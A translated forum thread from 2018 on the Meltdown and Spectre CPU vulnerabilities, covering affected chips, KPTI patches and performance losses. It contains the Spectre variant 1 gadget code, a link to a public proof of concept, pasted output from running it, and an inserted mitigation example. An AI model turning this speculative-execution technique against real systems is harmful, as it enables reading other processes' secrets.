1
linux40 2018-01-04 09:07:15 +08:00
So it's actually two bugs... a nightmare...
2
rogwan 2018-01-04 09:11:51 +08:00 via Android
Still haven't figured out how to crawl into this hole. Depressing.
3
lisonfan 2018-01-04 09:41:06 +08:00 1
4
joyqi 2018-01-04 09:43:09 +08:00
It's a conspiracy, damn it, forcing us to upgrade our CPUs.
5
ytlm 2018-01-04 09:43:50 +08:00
No idea what this means, but it sounds impressive.
6
realpg 2018-01-04 09:44:00 +08:00 3
Let's see whether some powerful country demands a CPU recall... and demands a fix that doesn't cost performance.
7
dndx OP @realpg To this day Intel still hasn't admitted their CPUs are defective; they say the KPTI patch is simply how the CPU should have been used all along.
In other words, the 30% performance advantage you had before KPTI was the bug. They're clearly dodging responsibility, and that's the main reason Linus blew up.
8
f2f2f 2018-01-04 09:49:36 +08:00 1
Hahaha, sorry, we squeezed out a bit too much toothpaste for you before, now I'd like to take a little back #kidding
10
mmmyc 2018-01-04 09:55:07 +08:00 via Android
Not being a programmer, I still have no idea what's being discussed.
11
realpg 2018-01-04 09:55:33 +08:00
12
QAPTEAWH 2018-01-04 09:56:43 +08:00 via iPhone
I suspect it's a deliberately planted backdoor.
13
Nin 2018-01-04 09:57:29 +08:00 4
The "Spectre" bug exists in nearly every processor with out-of-order execution and branch prediction, but it is not very dangerous and is hard to patch.
The "Meltdown" bug is the most dangerous vulnerability this time; it exists in most Intel processors and in ARM Cortex-A75. AMD's processors (the "farm company") have it too, as do some other ARM processors, but they can't complete all the steps of the attack.
14
ryd994 2018-01-04 10:01:02 +08:00 via Android
What Linus is ranting about is that these workarounds are hardcoded and can't be toggled at compile time.
Intel, by hardcoding this now, are you saying you never intend to actually fix this problem, and plan to keep fooling yourselves with this workaround forever?
18
evagreenworking 2018-01-04 10:12:23 +08:00 2
Speculative attacks affect every current operating system. Anything with a web browser, including iOS's WebKit, needs a patch. I'm wondering what QQ's X5 will do.
19
JackBlack2006 2018-01-04 10:14:01 +08:00
On the AMD side it seems the Ryzen series is safe, the FX series got hit, and the even older Phenom/Athlon lines are safe?
@Nin
20
KyonLi 2018-01-04 10:14:08 +08:00 1
"Intel and AMD CPUs are affected by the 'Meltdown' bug, which allows reading memory across privilege levels; this is the bug KPTI fixes, and AMD is not affected."
Am I the only one who can't parse that sentence?
21
JackBlack2006 2018-01-04 10:15:20 +08:00
22
dndx OP
25
dndx OP
26
leakless 2018-01-04 10:30:20 +08:00 2
Back row here, buying i7 8700K for 870.
28
leakless 2018-01-04 10:44:21 +08:00
@em84 Selling an i7 8700K for 8700 yen, huh... well then, I'll reluctantly take it...
I'll quietly bear the risk of getting hacked myself and leave the security to you... win-win~
29
ryd994 2018-01-04 11:02:36 +08:00 via Android
So the 8th gen isn't spared either?
30
lrxiao 2018-01-04 11:05:36 +08:00
Does KPTI do nothing against Spectre?
31
lrxiao 2018-01-04 11:07:32 +08:00 1
@dndx ? The Google blog says Spectre Variant 1 is user reading kernel, and Variant 2 can get a VM reading the host.
32
lrxiao 2018-01-04 11:09:14 +08:00 1
@ryd994 One claim is that everything since the Pentium Pro (1995) has this problem; others say everything after the Pentium 4, with very few exceptions.
33
dndx OP @lrxiao See section 1.1 Our Results of the Spectre paper. As I understand it, KPTI fixes Meltdown; there is no general fix for Spectre.
34
ryd994 2018-01-04 11:11:22 +08:00 via Android 9
35
zone53 2018-01-04 11:18:21 +08:00
So will the MBP I just bought be discounted?
36
gamexg 2018-01-04 11:26:11 +08:00
Why do I feel the second one is more serious?
You browse a web page and JS reads the passwords out of KeePass's memory?
38
lrxiao 2018-01-04 11:35:44 +08:00
Yeah, should be. I went and had another look on reddit.
39
uyhyygyug1234 2018-01-04 11:38:59 +08:00
The exploit has been released; could it do another round like WannaCry last time.....
40
xuanboyi 2018-01-04 11:44:33 +08:00 via iPhone 1
@zone53 https://9to5mac.com/2018/01/03/mac-fix-for-intel-kernel-bug/ The Mac patch from December last year already fixed it, with no slowdown at all.
41
dndx OP @gamexg Yes, and what's more awkward is that Spectre can't be fixed easily. The "fix" Chrome 64 is about to ship only reduces the precision of performance.now so that timing attacks become less efficient. It doesn't solve the root problem.
That's also why Chrome officially only calls it a "temporary measure".
42
privil 2018-01-04 12:04:03 +08:00
@xuanboyi #40 https://www.zhihu.com/question/265012502/answer/288724020 Is that because of PCID? Anyway, this vulnerability doesn't affect individual users much; it's cloud providers who are hit hard. Aliyun has already scheduled an upgrade for the 12th.
44
Syaoran 2018-01-04 12:26:03 +08:00 2
Newbie here, can't follow this.
As an individual user, if I had to choose between 30% performance and security, I'd choose the 30% performance.
45
dndx OP @gamexg Right, a memory read can't be used directly for privilege escalation, but it can serve as a vector for it.
Put another way, if you can already read other processes' data at will as an ordinary user in Ring 3, privilege escalation isn't really necessary anymore. After all, escalating only lets you read that same stuff.
46
winterbells 2018-01-04 12:52:07 +08:00
Seems nobody has mentioned MediaTek..
47
Akkuman 2018-01-04 12:58:21 +08:00 via Android 1
@winterbells ARM was mentioned; isn't that included?
48
rocksolid 2018-01-04 13:02:13 +08:00 1
@winterbells MediaTek uses the ARM architecture too.
49
ltux 2018-01-04 13:35:13 +08:00
"Why is this all done without any configuration options?" Heh, isn't this exactly the same as the iPhone throttling, without any options.
50
ltux 2018-01-04 13:36:55 +08:00 1
Fits Apple perfectly.
Because I really see exactly two possibilities: - Apple never intends to fix anything OR - these workarounds should have a way to disable them.
51
eurokingbai2 2018-01-04 13:42:05 +08:00
Has nobody mentioned Loongson?
52
VYSE 2018-01-04 13:53:29 +08:00 1
    struct array {
        unsigned long length;
        unsigned char data[];
    };

    struct array *arr1 = ...; /* small array */
    struct array *arr2 = ...; /* array of size 0x400 */
    /* >0x400 (OUT OF BOUNDS!) */
    unsigned long untrusted_offset_from_caller = ...;
    if (untrusted_offset_from_caller < arr1->length) {
        unsigned char value = arr1->data[untrusted_offset_from_caller];
        unsigned long index2 = ((value&1)*0x100)+0x200;
        if (index2 < arr2->length) {
            unsigned char value2 = arr2->data[index2];
        }
    }

Any architecture on which speculative execution can bring arr2->data[index2] into the cache is affected by SPECTRE.
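An added illustration of the first half of that gadget (the bounds check that speculation runs past) next to a branch-free fix; this is example code written for this thread, not from the post above or from the Project Zero writeup it quotes. It assumes a constructed 8-byte array and uses the index-masking technique the Linux kernel applies through array_index_nospec(); the second, cache-leaking load is not needed to show the fix.

```c
#include <stddef.h>

/* Constructed sample data (not from the post): only indexes 0..7 are valid. */
static const unsigned char arr1_data[8] = {10, 11, 12, 13, 14, 15, 16, 17};
static const size_t arr1_len = sizeof arr1_data;

/* The bounds check exactly as in the post's gadget. Architecturally it is
 * correct, but the compare is a branch: a trained predictor lets the CPU run
 * the load with an out-of-bounds index before the branch resolves, and the
 * cache line that load touched is not rolled back when the result is squashed. */
unsigned char lookup_branch_only(size_t untrusted_index)
{
    if (untrusted_index < arr1_len)
        return arr1_data[untrusted_index];
    return 0;
}

/* Branch-free clamp in the style of the Linux kernel's
 * array_index_mask_nospec(): all-ones when index < size, zero otherwise.
 * It is pure arithmetic, so speculation cannot skip it the way it skips the
 * branch above. Assumes index and size are both below 2^63 and relies on the
 * arithmetic right shift that gcc/clang perform on signed values. */
static inline size_t index_mask_nospec(size_t index, size_t size)
{
    long m = ~(long)(index | (size - 1 - index));
    return (size_t)(m >> (sizeof(long) * 8 - 1));
}

/* Same lookup with the index masked inside the guarded block: if this body
 * executes speculatively with a bad index, the mask is 0 and the load reads
 * arr1_data[0] instead of attacker-chosen memory. */
unsigned char lookup_nospec(size_t untrusted_index)
{
    if (untrusted_index < arr1_len) {
        size_t safe = untrusted_index & index_mask_nospec(untrusted_index, arr1_len);
        return arr1_data[safe];
    }
    return 0;
}
```

Both functions return the same values for every input; the difference is only in what the speculative path can touch.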
53
iFlicker 2018-01-04 14:53:57 +08:00
@eurokingbai2 As I recall, Loongson doesn't have an x86 license.
54
eurokingbai2 2018-01-04 14:57:09 +08:00
@iFlicker Loongson uses the MIPS instruction set, and the entire pipeline architecture was developed in-house.
55
HuHui 2018-01-04 16:18:42 +08:00
Suddenly reminded of that universal remote-access tool in 《疯狂的硬盘》 (Crazy Hard Drive).
56
zcljy 2018-01-04 16:35:20 +08:00 1
304 stainless steel basin (guaranteed not to leak) in exchange for any i5/i7 CPU; AMD brothers, lift your feet.
57
BlueFly 2018-01-04 18:11:23 +08:00
I don't get it. Is there an exploit tool for this yet?
59
VYSE 2018-01-04 19:07:56 +08:00
@BlueFly #57 There's a POC for testing whether you're vulnerable: https://github.com/Eugnis/spectre-attack
60
jaleo 2018-01-04 19:11:19 +08:00
That's why the state has been pushing for independently controllable processors.
A while ago it also officially released the first independently controllable network firewall.
61
bigphat 2018-01-04 19:40:46 +08:00
I tried to explain this to people of my parents' generation. Can the two bugs be described like this?
If data is money and the storage space is a bank: with Meltdown, a hacker can steal the central bank's money from inside the bank. With Spectre, a hacker can steal money from other people's accounts.
63
redsonic 2018-01-04 23:03:42 +08:00
@VYSE Tested on Linux: every newer processor with an invariant TSC was hit; the old Core 2 hit an illegal instruction at __rdtscp, and after switching to rdtsc it ran but basically wasn't hit. If the toothpaste factory just adds a switch to make the TSC a bit fuzzy, that should be enough to get past the Spectre attack.
New Celeron, Core i:

    # /tmp/spectre-attack
    Putting 'The Magic Words are Squeamish Ossifrage.' in memory
    Reading 40 bytes:
    Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x54='T' score=17 (second best: 0x05 score=6)
    Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x68='h' score=17 (second best: 0x05 score=6)
    Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0x65='e' score=2
    Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0x20=' ' score=2
    Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0x4D='M' score=2
    Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0x61='a' score=19 (second best: 0x00 score=6)
    Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x67='g' score=2
    Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0x69='i' score=2
    Reading at malicious_x = 0xffffffffffdfeba0... Success: 0x63='c' score=125 (second best: 0x00 score=61)
    Reading at malicious_x = 0xffffffffffdfeba1... Success: 0x20=' ' score=2
    Reading at malicious_x = 0xffffffffffdfeba2... Success: 0x57='W' score=2
    Reading at malicious_x = 0xffffffffffdfeba3... Success: 0x6F='o' score=2
    Reading at malicious_x = 0xffffffffffdfeba4... Success: 0x72='r' score=2
    Reading at malicious_x = 0xffffffffffdfeba5... Success: 0x64='d' score=2
    Reading at malicious_x = 0xffffffffffdfeba6... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfeba7... Success: 0x20=' ' score=97 (second best: 0x05 score=46)
    Reading at malicious_x = 0xffffffffffdfeba8... Success: 0x61='a' score=2
    Reading at malicious_x = 0xffffffffffdfeba9... Success: 0x72='r' score=2
    Reading at malicious_x = 0xffffffffffdfebaa... Success: 0x65='e' score=107 (second best: 0x00 score=50)
    Reading at malicious_x = 0xffffffffffdfebab... Success: 0x20=' ' score=2
    Reading at malicious_x = 0xffffffffffdfebac... Success: 0x53='S' score=2
    Reading at malicious_x = 0xffffffffffdfebad... Success: 0x71='q' score=2
    Reading at malicious_x = 0xffffffffffdfebae... Success: 0x75='u' score=2
    Reading at malicious_x = 0xffffffffffdfebaf... Success: 0x65='e' score=2
    Reading at malicious_x = 0xffffffffffdfebb0... Success: 0x61='a' score=513 (second best: 0x00 score=255)
    Reading at malicious_x = 0xffffffffffdfebb1... Success: 0x6D='m' score=2
    Reading at malicious_x = 0xffffffffffdfebb2... Success: 0x69='i' score=2
    Reading at malicious_x = 0xffffffffffdfebb3... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfebb4... Success: 0x68='h' score=13 (second best: 0x00 score=5)
    Reading at malicious_x = 0xffffffffffdfebb5... Success: 0x20=' ' score=2
    Reading at malicious_x = 0xffffffffffdfebb6... Success: 0x4F='O' score=17 (second best: 0x00 score=7)
    Reading at malicious_x = 0xffffffffffdfebb7... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfebb8... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfebb9... Success: 0x69='i' score=93 (second best: 0x00 score=45)
    Reading at malicious_x = 0xffffffffffdfebba... Success: 0x66='f' score=2
    Reading at malicious_x = 0xffffffffffdfebbb... Success: 0x72='r' score=2
    Reading at malicious_x = 0xffffffffffdfebbc... Success: 0x61='a' score=2
    Reading at malicious_x = 0xffffffffffdfebbd... Success: 0x67='g' score=2
    Reading at malicious_x = 0xffffffffffdfebbe... Success: 0x65='e' score=2
    Reading at malicious_x = 0xffffffffffdfebbf... Success: 0x2E='.' score=251 (second best: 0x00 score=122)

Old Core 2: the result differs on every run because the TSC is imprecise; this is the run with the most correct guesses:

    #./spectre-attack 10
    Putting 'The Magic Words are Squeamish Ossifrage.' in memory
    Reading 40 bytes:
    Reading at malicious_x = 0xffffffffffdfeb78... Success: 0x54='T' score=2
    Reading at malicious_x = 0xffffffffffdfeb79... Success: 0x68='h' score=2
    Reading at malicious_x = 0xffffffffffdfeb7a... Success: 0x65='e' score=6
    Reading at malicious_x = 0xffffffffffdfeb7b... Success: 0x20=' ' score=2
    Reading at malicious_x = 0xffffffffffdfeb7c... Success: 0x4D='M' score=1
    Reading at malicious_x = 0xffffffffffdfeb7d... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb7e... Success: 0x67='g' score=1
    Reading at malicious_x = 0xffffffffffdfeb7f... Success: 0x69='i' score=1
    Reading at malicious_x = 0xffffffffffdfeb80... Success: 0x63='c' score=2
    Reading at malicious_x = 0xffffffffffdfeb81... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb82... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb83... Success: 0x6F='o' score=1
    Reading at malicious_x = 0xffffffffffdfeb84... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb85... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb86... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfeb87... Success: 0x66='f' score=1
    Reading at malicious_x = 0xffffffffffdfeb88... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb89... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8a... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8b... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8c... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8d... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8e... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb8f... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb90... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb91... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb92... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb93... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb94... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb95... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb96... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb97... Success: 0x73='s' score=2
    Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x00='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x69='i' score=2
    Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0xFF='?' score=0
    Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x65='e' score=1
    Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0xFF='?' score=0
67
cppgohan 2018-01-05 00:17:38 +08:00
68
qfdk 2018-01-05 01:36:09 +08:00 via iPhone
@bigphat Simpler: you bought a new apartment, and your own key can open every door in the whole building... The fix: install a security door. The consequence is that you have to open one more door when you get home, which wastes time getting in.
69
mingl0280 2018-01-05 02:38:03 +08:00
After patching, VM performance dropped badly (writes dropped by half, reads by a third; VM environment only)......
Just fuck intel......
70
lsmgeb89 2018-01-05 03:30:47 +08:00
Intel at least has to compensate customers somehow, otherwise this is too annoying.
71
fline 2018-01-05 04:13:13 +08:00
I want to know whether the Snapdragon 845 is affected, hahahaha, it's funny just thinking about it..
72
lightening 2018-01-05 04:18:56 +08:00
The first sentence is mistranslated; read it again yourself......
73
stabc 2018-01-05 04:45:10 +08:00
Can someone explain in plain language: if this "BUG" isn't patched, in what scenarios might I run into what problems?
74
farseeraliens 2018-01-05 05:08:38 +08:00 via iPhone 3
@cppgohan dollar=cash=cache,
I=instruction. What Linus means is that the CPU builds in an instruction cache bucketed by CPL; even a crude method like that would do to achieve the "make sure..." in the previous sentence, since once everything is separated by CPL you definitely can't cross privilege levels... Who knows whether the hardware engineers skipped it because of cost constraints.
75
mortal 2018-01-05 08:07:32 +08:00
77
alexyangjie 2018-01-05 10:18:28 +08:00 via iPhone
I wonder: if the VPS host is patched but the VM isn't, can it read other VMs' data?
78
Loyalsoldier 2018-01-05 10:29:23 +08:00
So which CPU models are affected exactly? Or which models aren't?
79
kaneg 2018-01-05 10:58:58 +08:00
How do you tell whether the system has the patches fixing these issues, for both Windows and Linux?
Ordinary users are at everyone's mercy.
81
eurokingbai2 2018-01-05 11:18:42 +08:00
@alexyangjie Of course not. The VM's memory space is part of the host's memory space and is governed by the host's memory management.
82
eurokingbai2 2018-01-05 11:20:32 +08:00
@alexyangjie If both host and VM are patched, maybe you get a double performance debuff..
84
kaneg 2018-01-05 12:09:55 +08:00 via iPhone
@eurokingbai2
If that's the case, once the host is patched the VM doesn't need to be, otherwise the performance loss is even bigger. Conversely, if the VM is patched but the host isn't, it's still useless. If the above reasoning is right, does a VPS hosted in the cloud not need patching at all, and can just wait for the vendor to fix it?
85
dndx OP @farseeraliens Intel will certainly never do that; it would multiply the complexity of the instruction cache circuitry by 4 outright. I doubt it's achievable without a major architecture change.
86
gamexg 2018-01-05 15:24:57 +08:00
@mingl0280 #69 Which virtualization type?
I see ESXi claims that ESXi itself shows no performance degradation after patching, though the VMs still need their own patches, and those will cause a performance drop. Now, the big question … Will applying the patch slow down ESXi? The answer is no. All tests performed so far have shown that the patch has no measurable impact on ESXi. The virtualization specific performance impact of these mitigations should be negligible, if any. That said, depending on how guest OSes are fixed against those vulnerabilities may impact their own performance. Please check with the other respective OS vendors for more information.
87
lslqtz 2018-01-05 16:16:45 +08:00 via iPhone
Are the iDevice A-series chips affected?
90
privil 2018-01-05 16:53:15 +08:00
@clino #89 If you have antivirus installed, it can probably catch malware before it takes effect. The major vendors' software has already started patching the vulnerabilities; keep it updated. The performance loss for personal PCs is small; cloud providers are the miserable ones.
91
egen 2018-01-05 17:09:38 +08:00 1
@lslqtz #87
Apple has confirmed that all Mac and iOS devices are affected by the Meltdown and Spectre CPU vulnerabilities.
94
robinlovemaggie 2018-01-05 18:14:36 +08:00
"Intel never intends to fix anything", haha, so true.